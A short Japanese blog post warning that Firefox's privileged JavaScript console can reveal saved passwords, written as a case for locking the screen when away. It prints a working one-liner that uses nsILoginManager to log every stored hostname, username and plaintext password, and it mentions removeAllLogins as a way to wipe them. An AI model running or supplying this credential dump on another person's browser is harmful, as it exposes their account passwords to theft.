JavaScriptコンソールからパスワードぶっこ抜き - hogehogeホントだ怖い。JavaScriptコンソールの上部の入力欄はChrome特権のコードも実行できるんで、XPConnectからゴニョゴニョっとやると平文パスワードを覗くことができちゃうんだね。
PCから離れるときは画面ロックをしないと危険ということかな。
具体的なコードは
Cc["@mozilla.org/login-manager;1"].getService(Ci.nsILoginManager).getAllLogins({}).forEach(function(li){ console.log(li.hostname + ":" + li.username + "," + li.password) });
※あっ書いちゃった...離席中に覗かれるのも怖いけど、removeAllLogins実行されるのも怖い。
※もちろん特権ないと実行出来ないのでブラウジングだけで盗まれる物ではありません。